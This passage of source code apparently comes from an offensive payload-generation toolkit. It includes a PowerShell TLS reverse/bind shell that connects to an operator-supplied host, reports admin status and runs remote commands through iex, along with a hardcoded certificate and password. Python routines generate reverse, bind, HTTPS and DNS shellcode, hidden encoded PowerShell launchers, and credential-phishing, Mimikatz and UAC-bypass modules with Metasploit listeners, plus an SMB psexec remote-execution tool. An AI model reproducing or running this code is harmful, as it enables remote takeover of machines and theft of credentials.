3 | $Base64Cert = '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' 4 | $CertPassword = 'password' 5 | $isbind = $%s 6 | 7 | Function Exec-Process ($execPath, $execArgs) { 8 | if ($execPath -eq 'powershell') { 9 | $execPath = (Get-Command powershell.exe).Definition 10 | } 11 | $pinfo = New-Object System.Diagnostics.ProcessStartInfo 12 | $pinfo.FileName = $execPath 13 | $pinfo.RedirectStandardError = $true 14 | $pinfo.RedirectStandardOutput = $true 15 | $pinfo.UseShellExecute = $false 16 | $pinfo.Arguments = $execArgs 17 | $p = New-Object System.Diagnostics.Process 18 | $p.StartInfo = $pinfo 19 | $p.Start() | Out-Null 20 | [pscustomobject]@{ 21 | stdout = $p.StandardOutput.ReadToEnd() 22 | stderr = $p.StandardError.ReadToEnd() 23 | exitcode = $p.ExitCode 24 | } 25 | $p.WaitForExit() 26 | } 27 | 28 | Function Connect-Server ($ip, $port) { 29 | $connectionTrys = 10 30 | if (!$isbind) { 31 | while($connectionTrys -gt 0) { 32 | try{ 33 | $Socket = New-Object System.Net.Sockets.TCPClient($ip,$port) 34 | if ($Socket.Connected) { 35 | break 36 | } 37 | } catch { 38 | $connectionTrys = $connectionTrys - 1 39 | Start-Sleep -s 1 40 | } 41 | } 42 | } else { 43 | $SSLcertfake = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2([System.Convert]::FromBase64String($Base64Cert), $CertPassword) 44 | $listener = [System.Net.Sockets.TcpListener]$port 45 | $listener.start() 46 | $Socket = $listener.AcceptTcpClient() 47 | } 48 | 49 | if ($Socket.Connected) { 50 | $sslSocket = New-Object System.Net.Security.SslStream $Socket.GetStream(), $false, ({$True} -as [Net.Security.RemoteCertificateValidationCallback]) 51 | if (!$isbind) 52 | { 53 | $sslSocket.AuthenticateAsClient($env:computername) 54 | } else { 55 | $sslSocket.AuthenticateAsServer($SSLcertfake, $false, [System.Security.Authentication.SslProtocols]::Tls, $false) 56 | } 57 | 58 | 59 | 60 | if ((New-Object Security.Principal.WindowsPrincipal ([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) { 61 | $isAdmin = "True" 62 | } else { 63 | $isAdmin = "False" 64 | } 65 | $userandPriv = "`0" + "`0" + "[#check#]" + $env:computername + ":" + $isAdmin 66 | $sendUserandPriv = ([text.encoding]::ASCII).GetBytes($userandPriv, 0, $userandPriv.Length) 67 | $sslSocket.Write($sendUserandPriv) 68 | $Connected = $True 69 | } 70 | else { 71 | $Connected = $False 72 | } 73 | [pscustomobject]@{ 74 | Connected = $Connected 75 | Socket = $Socket 76 | Client = $sslSocket 77 | } 78 | } 79 | 80 | 81 | $Client = Connect-Server -ip '%s' -port '%s' 82 | 83 | if ($Client.Connected) { 84 | while ($True) { 85 | 86 | $error.clear() 87 | $serverData = $Client.Client.Read($byteAmount, 0, $byteAmount.Length) 88 | $asciiData = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($byteAmount, 0, $serverData) 89 | try { 90 | $type = ($asciiData | ConvertFrom-Json).type 91 | $b64Data = ($asciiData | ConvertFrom-Json).data 92 | $sendoutput = ($asciiData | ConvertFrom-Json).sendoutput 93 | $multiple = ($asciiData | ConvertFrom-Json).multiple 94 | $data = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64Data)) 95 | $extra = ($asciiData | ConvertFrom-Json).extra 96 | } catch { 97 | continue 98 | } 99 | 100 | if ($serverData -lt 1) { 101 | exit 102 | } 103 | 104 | if ($type -eq 'exec') { 105 | $sendtoServer = (iex -c $data 2>&1 | Out-String) 106 | if ($error[0]) { 107 | $sendtoServer = ($error[0] | Out-String) 108 | } 109 | if ($sendtoServer.Length -lt 1) { 110 | $sendtoServer = "`0" 111 | } 112 | } 113 | 114 | #if ($type -eq 'uacbypass') { 115 | 116 | 117 | #} 118 | 119 | if ($type -eq 'script') { 120 | $process = Exec-Process -execPath 'powershell' -execArgs ('-c ' + $data) 121 | if ($process.exitcode -eq 0) { 122 | $sendtoServer = $process.stdout 123 | } 124 | else { 125 | $sendtoServer = $process.stderr 126 | } 127 | } 128 | 129 | if ($multiple -eq 'true') { 130 | $multiplescript += $data 131 | } 132 | 133 | if ($multiple -eq 'exec') { 134 | IEX -c $multiplescript 2>&1 | Out-String 135 | $multiplescript = "" 136 | } 137 | 138 | if ($sendoutput -eq 'true') { 139 | $asciiBytes = ([text.encoding]::ASCII).GetBytes($sendtoServer, 0, $sendtoServer.Length) 140 | $Client.Client.Write($asciiBytes) 141 | $Client.Client.Flush() 142 | } 143 | } 144 | } 145 | -------------------------------------------------------------------------------- /lib/preparepayload.py: -------------------------------------------------------------------------------- 1 | from main import * 2 | from payloadextras import * 3 | from startmetasploit import * 4 | from generatepayload import * 5 | 6 | def checkClientUpload(payloadname, powershellExec, isExe): 7 | from menu import clientMenuOptions 8 | if len(clientMenuOptions.keys()) > 2: 9 | return DoClientUpload(payloaddir(),payloadname,powershellExec,isExe) 10 | else: 11 | print powershellExec 12 | 13 | def reverseIpAndPort(port): 14 | portnum = raw_input( 15 | '\n[*] Press Enter For Default Port(%s)\n[*] Port> '%(t.bold_green + port + t.normal)) 16 | if len(portnum) is 0: 17 | portnum = port 18 | IP = FUNCTIONS().CheckInternet() 19 | ipaddr = raw_input( 20 | '\n[*] Press Enter To Get Local Ip Automatically(%s)\n[*] IP> '%(t.bold_green + IP + t.normal)) 21 | if len(ipaddr) == 0: 22 | ipaddr = IP 23 | if not IP: 24 | print t.bold_red + 'Error Getting Ip Automatically' + t.normal 25 | ipaddr = raw_input( 26 | '\n[*] Please Enter Your IP Manually(Automatic Disabled)\n[*] IP> ') 27 | return (portnum,ipaddr) 28 | 29 | def reversePayloadGeneration(payloadchoice,payloadname): 30 | portnum,ipaddr = reverseIpAndPort('4444') 31 | try: 32 | ip1, ip2, ip3, ip4 = ipaddr.split('.') 33 | iphex = struct.pack('BBBB', int(ip1), int(ip2), int(ip3), int(ip4)) 34 | except Exception as E: 35 | print E 36 | print t.bold_red + '[*] Error in IP Syntax' 37 | sys.exit(1) 38 | try: 39 | porthex = struct.pack('>h', int(portnum)) 40 | except: 41 | print t.bold_red + '[*] Error in Port Syntax' 42 | sys.exit(1) 43 | shellcode = payloadchoice % (iphex, porthex) 44 | print t.bold_green + '[*] IP SET AS %s\n[*] PORT SET AS %s\n' % (ipaddr, portnum) + t.normal 45 | if payloadname == "Windows_Reverse_Shell": 46 | ez2read_shellcode, startRevMetasploit = askAndReturnModules(shellcode,'nclistener') 47 | else: 48 | ez2read_shellcode, startRevMetasploit = askAndReturnModules(shellcode,'reverse') 49 | GeneratePayload(ez2read_shellcode,payloadname,shellcode) 50 | startRevMetasploit(portnum) 51 | return "clear" 52 | 53 | def bindPayloadGeneration(payloadchoice,payloadname): 54 | bindport = raw_input( 55 | '\n[*] Press Enter For Default Bind Port(%s)\n[*] Port> '%(t.bold_green + '4444' + t.normal)) 56 | if len(bindport) is 0: 57 | bindport = 4444 58 | try: 59 | bindporthex = struct.pack('>h', int(bindport)) 60 | except: 61 | print t.bold_red + '[!] Error in Port Syntax' + t.normal 62 | sys.exit(1) 63 | shellcode = payloadchoice % (bindporthex) 64 | bindip = raw_input( 65 | '\n[*] Target Bind IP Address ' + t.bold_red + '(REQUIRED FOR BIND PAYLOADS)' + t.normal +' \n[*] IP> ') 66 | print t.bold_green + '[*] BIND IP SET AS %s\n[*] PORT SET AS %s\n' % (bindip,bindport) + t.normal 67 | ez2read_shellcode, startBindMetasploit = askAndReturnModules(shellcode,'bind') 68 | GeneratePayload(ez2read_shellcode,payloadname,shellcode) 69 | startBindMetasploit(bindport,bindip) 70 | return "clear" 71 | 72 | def httpsPayloadGeneration(payloadchoice,payloadname): 73 | portnum,ipaddr = reverseIpAndPort('443') 74 | try: 75 | porthex = struct.pack(' '%(t.bold_green + '4444' + t.normal)) 91 | if len(portnum) is 0: 92 | portnum = 4444 93 | try: 94 | porthex = struct.pack('>h', int(portnum)) 95 | except: 96 | print t.bold_red + '[*] Error in Port Syntax' 97 | sys.exit(1) 98 | while True: 99 | DNSaddr = raw_input( 100 | '\n[*] Please Enter DNS Hostname\n[*] DNS> ') 101 | if DNSaddr: 102 | break 103 | shellcode = payloadchoice % (DNSaddr,porthex) 104 | print t.bold_green + '[*] DNS HOSTNAME SET AS %s\n[*] PORT SET AS %s\n' % (DNSaddr, portnum) + t.normal 105 | ez2read_shellcode, startDnsMetasploit = askAndReturnModules(shellcode,'dns') 106 | GeneratePayload(ez2read_shellcode,payloadname,shellcode) 107 | startDnsMetasploit(portnum,DNSaddr) 108 | return "clear" 109 | 110 | def reversePowerShellWatchScreenGeneration(payloadchoice,payloadname): 111 | portnum,ipaddr = reverseIpAndPort('4444') 112 | shellcode = payloadchoice % (ipaddr,portnum) 113 | powershellExec = 'powershell.exe -WindowStyle Hidden -enc %s'%(base64.b64encode(shellcode.encode('utf_16_le'))) 114 | print t.bold_green + '\n[*] Powershell Has Been Generated' + t.normal 115 | checkClientUpload(payloadname,powershellExec,isExe=False) 116 | from listener import Server 117 | listenerserver = Server('0.0.0.0', int(portnum), bindsocket=True) 118 | relayserver = Server('127.0.0.1', 8081, relay=True) 119 | os.system('firefox 127.0.0.1:8081') 120 | print 'waiting for connection...\nCTRL + C when done\n' 121 | try: 122 | while not listenerserver.handlers: 123 | time.sleep(0.5) 124 | while listenerserver: 125 | if listenerserver.handlers[1].in_buffer: 126 | relayserver.handlers[1].out_buffer.append(listenerserver.handlers[1].in_buffer.pop()) 127 | except KeyboardInterrupt: 128 | if listenerserver.handlers: 129 | listenerserver.handlers[1].handle_close() 130 | return "pass" 131 | 132 | def reversePowerShellAskCredsGeneration(payloadchoice,payloadname): 133 | json = '{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}'% (base64.b64encode(payloadchoice.encode('utf_16_le'))) 134 | clientnumber = int(checkClientUpload(payloadname,json,isExe=False)) 135 | from stager import returnServerList 136 | try: 137 | for server in returnServerList(): 138 | while True: 139 | if server.handlers[clientnumber].in_buffer: 140 | print server.handlers[clientnumber].in_buffer.pop() 141 | break 142 | else: 143 | time.sleep(0.1) 144 | except KeyboardInterrupt: 145 | pass 146 | return "pass" 147 | 148 | def reversePowerShellInvokeMimikatzGeneration(payloadchoice,payloadname): 149 | json = '{"type":"script", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le'))) 150 | clientnumber = int(checkClientUpload(payloadname,json,isExe=False)) 151 | from stager import returnServerList 152 | try: 153 | for server in returnServerList(): 154 | while True: 155 | if server.handlers[clientnumber].in_buffer: 156 | print server.handlers[clientnumber].in_buffer.pop() 157 | break 158 | else: 159 | time.sleep(0.1) 160 | except KeyboardInterrupt: 161 | pass 162 | return "pass" 163 | 164 | def UACBypassGeneration(payloadchoice,payloadname): 165 | win7orwin10 = raw_input(t.bold_red + '[*] Windows 7 or 10?' + t.bold_red + ' 7/[10]:' + t.normal) 166 | if not win7orwin10: 167 | win7orwin10 = "10" 168 | if win7orwin10 == "7": 169 | json = '{"type":"uacbypass", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le'))) 170 | else: 171 | json = '{"type":"uacbypass", "data":"%s", "sendoutput":"true"}'% (base64.b64encode(payloadchoice.encode('utf_16_le'))) 172 | clientnumber = int(checkClientUpload(payloadname,json,isExe=False)) 173 | from stager import returnServerList 174 | try: 175 | for server in returnServerList(): 176 | while True: 177 | if server.handlers[clientnumber].in_buffer: 178 | print server.handlers[clientnumber].in_buffer.pop() 179 | break 180 | else: 181 | time.sleep(0.1) 182 | except KeyboardInterrupt: 183 | pass 184 | return "pass" 185 | -------------------------------------------------------------------------------- /lib/psexec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom) 9 | # 10 | # Author: 11 | # beto (@agsolino) 12 | # 13 | # Reference for: 14 | # DCE/RPC and SMB. 15 | 16 | import sys 17 | import os 18 | import cmd 19 | import logging 20 | from threading import Thread, Lock 21 | import argparse 22 | import random 23 | import string 24 | import time 25 | 26 | from impacket.examples import logger 27 | from impacket import version, smb 28 | from impacket.smbconnection import SMBConnection 29 | from impacket.dcerpc.v5 import transport 30 | from impacket.structure import Structure 31 | from impacket.examples import remcomsvc, serviceinstall 32 | 33 | 34 | class RemComMessage(Structure): 35 | structure = ( 36 | ('Command','4096s=""'), 37 | ('WorkingDir','260s=""'), 38 | ('Priority',' 0: 105 | try: 106 | s.waitNamedPipe(tid,pipe) 107 | pipeReady = True 108 | except: 109 | tries -= 1 110 | time.sleep(2) 111 | pass 112 | 113 | if tries == 0: 114 | logging.critical('Pipe not ready, aborting') 115 | raise 116 | 117 | fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80) 118 | 119 | return fid 120 | 121 | def doStuff(self, rpctransport): 122 | 123 | dce = rpctransport.get_dce_rpc() 124 | try: 125 | dce.connect() 126 | except Exception, e: 127 | logging.critical(str(e)) 128 | sys.exit(1) 129 | 130 | global dialect 131 | dialect = rpctransport.get_smb_connection().getDialect() 132 | 133 | try: 134 | unInstalled = False 135 | s = rpctransport.get_smb_connection() 136 | 137 | # We don't wanna deal with timeouts from now on. 138 | s.setTimeout(100000) 139 | if self.__exeFile is None: 140 | installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), remcomsvc.RemComSvc()) 141 | else: 142 | try: 143 | f = open(self.__exeFile) 144 | except Exception, e: 145 | logging.critical(str(e)) 146 | sys.exit(1) 147 | installService = serviceinstall.ServiceInstall(rpctransport.get_smb_connection(), f) 148 | 149 | installService.install() 150 | 151 | if self.__exeFile is not None: 152 | f.close() 153 | 154 | # Check if we need to copy a file for execution 155 | if self.__copyFile is not None: 156 | installService.copy_file(self.__copyFile, installService.getShare(), os.path.basename(self.__copyFile)) 157 | # And we change the command to be executed to this filename 158 | self.__command = os.path.basename(self.__copyFile) + ' ' + self.__command 159 | 160 | tid = s.connectTree('IPC$') 161 | fid_main = self.openPipe(s,tid,'\RemCom_communicaton',0x12019f) 162 | 163 | packet = RemComMessage() 164 | pid = os.getpid() 165 | 166 | packet['Machine'] = ''.join([random.choice(string.letters) for _ in range(4)]) 167 | if self.__path is not None: 168 | packet['WorkingDir'] = self.__path 169 | packet['Command'] = self.__command 170 | packet['ProcessID'] = pid 171 | 172 | s.writeNamedPipe(tid, fid_main, str(packet)) 173 | 174 | # Here we'll store the command we type so we don't print it back ;) 175 | # ( I know.. globals are nasty :P ) 176 | global LastDataSent 177 | LastDataSent = '' 178 | 179 | # Create the pipes threads 180 | stdin_pipe = RemoteStdInPipe(rpctransport,'\%s%s%d' % (RemComSTDIN ,packet['Machine'],packet['ProcessID']), smb.FILE_WRITE_DATA | smb.FILE_APPEND_DATA, installService.getShare() ) 181 | stdin_pipe.start() 182 | stdout_pipe = RemoteStdOutPipe(rpctransport,'\%s%s%d' % (RemComSTDOUT,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA ) 183 | stdout_pipe.start() 184 | stderr_pipe = RemoteStdErrPipe(rpctransport,'\%s%s%d' % (RemComSTDERR,packet['Machine'],packet['ProcessID']), smb.FILE_READ_DATA ) 185 | stderr_pipe.start() 186 | 187 | # And we stay here till the end 188 | ans = s.readNamedPipe(tid,fid_main,8) 189 | 190 | if len(ans): 191 | retCode = RemComResponse(ans) 192 | logging.info("Process %s finished with ErrorCode: %d, ReturnCode: %d" % (self.__command, retCode['ErrorCode'], retCode['ReturnCode'])) 193 | installService.uninstall() 194 | if self.__copyFile is not None: 195 | # We copied a file for execution, let's remove it 196 | s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile)) 197 | unInstalled = True 198 | sys.exit(retCode['ErrorCode']) 199 | 200 | except SystemExit: 201 | raise 202 | except: 203 | if unInstalled is False: 204 | print "[*] Sleeping While MeterPreter Migrates" 205 | time.sleep(10) 206 | installService.uninstall() 207 | if self.__copyFile is not None: 208 | s.deleteFile(installService.getShare(), os.path.basename(self.__copyFile)) 209 | sys.stdout.flush() 210 | sys.exit(1) 211 | 212 | class Pipes(Thread): 213 | def __init__(self, transport, pipe, permissions, share=None): 214 | Thread.__init__(self) 215 | self.server = 0 216 | self.transport = transport 217 | self.credentials = transport.get_credentials() 218 | self.tid = 0 219 | self.fid = 0 220 | self.share = share 221 | self.port = transport.get_dport() 222 | self.pipe = pipe 223 | self.permissions = permissions 224 | self.daemon = True 225 | 226 | def connectPipe(self): 227 | try: 228 | lock.acquire() 229 | global dialect 230 | #self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT) 231 | self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(), sess_port = self.port, preferredDialect = dialect) 232 | user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials 233 | if self.transport.get_kerberos() is True: 234 | self.server.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS) 235 | else: 236 | self.server.login(user, passwd, domain, lm, nt) 237 | lock.release() 238 | self.tid = self.server.connectTree('IPC$') 239 | 240 | self.server.waitNamedPipe(self.tid, self.pipe) 241 | self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80) 242 | self.server.setTimeout(1000000) 243 | except: 244 | logging.error("Something wen't wrong connecting the pipes(%s), try again" % self.__class__) 245 | 246 | 247 | class RemoteStdOutPipe(Pipes): 248 | def __init__(self, transport, pipe, permisssions): 249 | Pipes.__init__(self, transport, pipe, permisssions) 250 | 251 | def run(self): 252 | self.connectPipe() 253 | while True: 254 | try: 255 | ans = self.server.readFile(self.tid,self.fid, 0, 1024) 256 | except: 257 | pass 258 | else: 259 | try: 260 | global LastDataSent 261 | if ans != LastDataSent: 262 | sys.stdout.write(ans.decode('cp437')) 263 | sys.stdout.flush() 264 | else: 265 | # Don't echo what I sent, and clear it up 266 | LastDataSent = '' 267 | # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars, 268 | # it will give false positives tho.. we should find a better way to handle this. 269 | if LastDataSent > 10: 270 | LastDataSent = '' 271 | except: 272 | pass 273 | 274 | class RemoteStdErrPipe(Pipes): 275 | def __init__(self, transport, pipe, permisssions): 276 | Pipes.__init__(self, transport, pipe, permisssions) 277 | 278 | def run(self): 279 | self.connectPipe() 280 | while True: 281 | try: 282 | ans = self.server.readFile(self.tid,self.fid, 0, 1024) 283 | except: 284 | pass 285 | else: 286 | try: 287 | sys.stderr.write(str(ans)) 288 | sys.stderr.flush() 289 | except: 290 | pass 291 | 292 | class RemoteShell(cmd.Cmd): 293 | def __init__(self, server, port, credentials, tid, fid, share, transport): 294 | cmd.Cmd.__init__(self, False) 295 | self.prompt = '\x08' 296 | self.server = server 297 | self.transferClient = None 298 | self.tid = tid 299 | self.fid = fid 300 | self.credentials = credentials 301 | self.share = share 302 | self.port = port 303 | self.transport = transport 304 | self.intro = '[!] Press help for extra shell commands' 305 | 306 | def connect_transferClient(self): 307 | #self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = SMB_DIALECT) 308 | self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port = self.port, preferredDialect = dialect) 309 | user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials 310 | if self.transport.get_kerberos() is True: 311 | self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGT=TGT, TGS=TGS) 312 | else: 313 | self.transferClient.login(user, passwd, domain, lm, nt) 314 | 315 | def do_help(self, line): 316 | print """ 317 | lcd {path} - changes the current local directory to {path} 318 | exit - terminates the server process (and this session) 319 | put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s) 320 | get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir 321 | ! {cmd} - executes a local shell cmd 322 | """ % (self.share, self.share) 323 | self.send_data('\r\n', False) 324 | 325 | def do_shell(self, s): 326 | os.system(s) 327 | self.send_data('\r\n') 328 | 329 | def do_get(self, src_path): 330 | try: 331 | if self.transferClient is None: 332 | self.connect_transferClient() 333 | 334 | import ntpath 335 | filename = ntpath.basename(src_path) 336 | fh = open(filename,'wb') 337 | logging.info("Downloading %s\%s" % (self.share, src_path)) 338 | self.transferClient.getFile(self.share, src_path, fh.write) 339 | fh.close() 340 | except Exception, e: 341 | logging.critical(str(e)) 342 | pass 343 | 344 | self.send_data('\r\n') 345 | 346 | def do_put(self, s): 347 | try: 348 | if self.transferClient is None: 349 | self.connect_transferClient() 350 | params = s.split(' ') 351 | if len(params) > 1: 352 | src_path = params[0] 353 | dst_path = params[1] 354 | elif len(params) == 1: 355 | src_path = params[0] 356 | dst_path = '/' 357 | 358 | src_file = os.path.basename(src_path) 359 | fh = open(src_path, 'rb') 360 | f = dst_path + '/' + src_file 361 | pathname = string.replace(f,'/','\\') 362 | logging.info("Uploading %s to %s\%s" % (src_file, self.share, dst_path)) 363 | self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read) 364 | fh.close() 365 | except Exception, e: 366 | logging.error(str(e)) 367 | pass 368 | 369 | self.send_data('\r\n') 370 | 371 | def do_lcd(self, s): 372 | if s == '': 373 | print os.getcwd() 374 | else: 375 | os.chdir(s) 376 | self.send_data('\r\n') 377 | 378 | def emptyline(self): 379 | self.send_data('\r\n') 380 | return 381 | 382 | def default(self, line): 383 | self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\r\n') 384 | 385 | def send_data(self, data, hideOutput = True): 386 | if hideOutput is True: 387 | global LastDataSent 388 | LastDataSent = data 389 | else: 390 | LastDataSent = '' 391 | self.server.writeFile(self.tid, self.fid, data) 392 | 393 | class RemoteStdInPipe(Pipes): 394 | def __init__(self, transport, pipe, permisssions, share=None): 395 | self.shell = None 396 | Pipes.__init__(self, transport, pipe, permisssions, share) 397 | 398 | def run(self): 399 | self.connectPipe() 400 | self.shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.share, self.transport) 401 | self.shell.cmdloop() 402 | 403 | # Process command-line arguments. 404 | if __name__ == '__main__': 405 | # Init the example's logger theme 406 | #logger.init() 407 | print version.BANNER 408 | 409 | parser = argparse.ArgumentParser(add_help = True, description = "PSEXEC like functionality example using RemComSvc.") 410 | 411 | parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') 412 | parser.add_argument('command', nargs='*', default = ' ', help='command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe)') 413 | parser.add_argument('-c', action='store',metavar = "pathname", help='copy the filename for later execution, arguments are passed in the command option') 414 | parser.add_argument('-path', action='store', help='path of the command to execute') 415 | parser.add_argument('-file', action='store', help="alternative RemCom binary (be sure it doesn't require CRT)") 416 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 417 | 418 | group = parser.add_argument_group('authentication') 419 | 420 | group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') 421 | group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') 422 | group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line') 423 | group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)') 424 | 425 | if 